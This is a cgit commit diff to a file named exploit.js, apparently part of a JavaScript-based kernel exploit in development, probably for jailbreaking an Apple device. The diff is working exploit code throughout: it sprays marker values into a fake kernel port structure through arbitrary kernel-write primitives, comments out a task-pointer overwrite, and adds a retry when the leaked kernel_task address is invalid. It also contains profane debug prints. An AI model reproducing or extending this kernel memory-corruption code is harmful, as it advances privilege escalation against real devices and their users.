summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js12
1 files changed, 10 insertions, 2 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6f34aaf..47ff1c0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -502,10 +502,15 @@ again: while (true) {
printf("fuck\n");
printf("fuck\n");
- write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i, 0x41410000 | i);
+ }
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i + 0x78, 0x41420000 | i);
+ }
+// write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
@@ -539,6 +544,9 @@ again: while (true) {
printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
printf("fuck\n");
call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ if (kernel_task_addr === 0xffffffff) {
+ continue again;
+ }
scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
printf("fuck\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:03:55 +0000